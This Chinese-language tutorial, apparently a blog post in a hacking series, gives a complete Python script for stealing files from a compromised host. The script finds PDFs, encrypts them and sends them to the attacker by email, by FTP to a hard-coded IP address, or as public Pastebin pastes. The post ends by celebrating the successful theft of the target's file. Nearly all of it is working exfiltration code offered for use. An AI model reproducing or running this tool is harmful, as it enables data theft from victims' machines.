描述
- 入侵到目标主机后,发现有趣的文件,将其加密后,通过ftp文件\邮件\第三方网站的方式将密文传输到自己的机子上,在本地还原数据文件
利用邮件传输
# smtp
smtp_server = 'smtp.163.com'
smtp_port = 587
smtp_acct = '[email protected]'
smtp_password = '123456'
tgt_accts = ['[email protected]']
def plain_email(subject, contents):
message = f"Subject: {subject}\nFrom {smtp_acct}\n"
message += f'To: {tgt_accts}\n\n{contents.decode()}'
server = smtplib.SMTP(smtp_server, smtp_port)
server.starttls()
server.login(smtp_acct, smtp_password)
server.sendmail(smtp_acct, tgt_accts, message)
time.sleep(1)
server.quit()
利用ftp文件传输
#ftp
ftp_srv = '192.168.43.126'
ftp_usr = 'z5onk0'
ftp_pwd = 'aaaaaa'
def plain_ftp(docpath, server=ftp_srv):
ftp = ftplib.FTP(server)
ftp.login(ftp_usr, ftp_pwd)
ftp.cwd('/home/test')
ftp.storbinary("STOR " + os.path.basename(docpath),
open(docpath, "rb"), 1024)
ftp.quit()
利用第三方网站pastebin传输
- 需要注册账号,然后分配一个api_dev_key
# web server
username = "z5onk0"
password = 'aaaaaa'
api_dev_key = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
def plain_paste(title, content):
login_url = 'https://pastebin.com/api/api_login.php'
login_data = {
'api_dev_key': api_dev_key,
'api_user_name': username,
'api_user_password': password,
}
r = requests.post(login_url, data=login_data)
api_user_key = r.text
paste_url = 'https://pastebin.com/api/api_post.php'
paste_data = {
'api_paste_name': title,
'api_paste_code': content.decode(),
'api_dev_key': api_dev_key,
'api_user_key': api_user_key,
'api_option': 'paste',
'api_paste_private': 0,
}
r = requests.post(paste_url, data=paste_data)
print(r.status_code)
print(r.text)
方法调度
- 遍历目标目录,找到某一后缀名的文件,yield返回文件路径
- 通过字典调度实现传输方法的调用:传入要选择的函数名,即可调用该函数,python函数是一等公民!
- 调用上一篇的encrypt函数对文件内容加密
#select way
WAY = {
'email': plain_email,
'ftp': plain_ftp,
'web': plain_paste,
}
def find_files(direcory, doc_type='.pdf'):
for parent, _, filenames in os.walk(direcory):
for filename in filenames:
if filename.endswith(doc_type):
file_path = os.path.join(parent, filename)
yield file_path
def dataleak(ori_path, method):
if method == 'ftp':
new_path = f'c:\\windows\\temp\\{os.path.basename(ori_path)}'
with open(ori_path, 'rb') as f1:
contents = f1.read()
with open(new_path, 'wb') as f2:
f2.write(encrypt(contents))
WAY[method](new_path)
os.unlink(new_path)
else:
with open(ori_path, 'rb') as f:
contents = f.read()
title = os.path.basename(ori_path)
contents = encrypt(contents)
WAY[method](title, contents)
完整代码
import ftplib
import os
import smtplib
import time
from encrypt import encrypt, decrypt
import requests
# smtp
smtp_server = 'smtp.163.com'
smtp_port = 587
smtp_acct = '[email protected]'
smtp_password = '123456'
tgt_accts = ['[email protected]']
def plain_email(subject, contents):
message = f"Subject: {subject}\nFrom {smtp_acct}\n"
message += f'To: {tgt_accts}\n\n{contents.decode()}'
server = smtplib.SMTP(smtp_server, smtp_port)
server.starttls()
server.login(smtp_acct, smtp_password)
server.sendmail(smtp_acct, tgt_accts, message)
time.sleep(1)
server.quit()
#ftp
ftp_srv = '192.168.43.126'
ftp_usr = 'z5onk0'
ftp_pwd = 'aaaaaa'
def plain_ftp(docpath, server=ftp_srv):
ftp = ftplib.FTP(server)
ftp.login(ftp_usr, ftp_pwd)
ftp.cwd('/home/dfl')
ftp.storbinary("STOR " + os.path.basename(docpath),
open(docpath, "rb"), 1024)
ftp.quit()
# web server
username = "z5onk0"
password = 'aaaaaa'
api_dev_key = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
def plain_paste(title, content):
login_url = 'https://pastebin.com/api/api_login.php'
login_data = {
'api_dev_key': api_dev_key,
'api_user_name': username,
'api_user_password': password,
}
r = requests.post(login_url, data=login_data)
api_user_key = r.text
paste_url = 'https://pastebin.com/api/api_post.php'
paste_data = {
'api_paste_name': title,
'api_paste_code': content.decode(),
'api_dev_key': api_dev_key,
'api_user_key': api_user_key,
'api_option': 'paste',
'api_paste_private': 0,
}
r = requests.post(paste_url, data=paste_data)
print(r.status_code)
print(r.text)
#select way
WAY = {
'email': plain_email,
'ftp': plain_ftp,
'web': plain_paste,
}
def find_files(direcory, doc_type='.pdf'):
for parent, _, filenames in os.walk(direcory):
for filename in filenames:
if filename.endswith(doc_type):
file_path = os.path.join(parent, filename)
yield file_path
def dataleak(ori_path, method):
if method == 'ftp':
new_path = f'c:\\windows\\temp\\{os.path.basename(ori_path)}'
with open(ori_path, 'rb') as f1:
contents = f1.read()
with open(new_path, 'wb') as f2:
f2.write(encrypt(contents))
WAY[method](new_path)
os.unlink(new_path)
else:
with open(ori_path, 'rb') as f:
contents = f.read()
title = os.path.basename(ori_path)
contents = encrypt(contents)
WAY[method](title, contents)
if __name__ =="__main__":
dir = os.getcwd()
for file in find_files(dir):
dataleak(file, 'ftp')
结果
- 选择paste方式传输,生成pastebin的网址
- 进入网址,看到已经上传的密文
- 用上一篇的decrypt函数进行解密,并写入到pdf文件中,下图中,左边pdf是目标机器上的原文件,右边pdf是传输到本地机器上还原后的文件,成功偷取目标文件!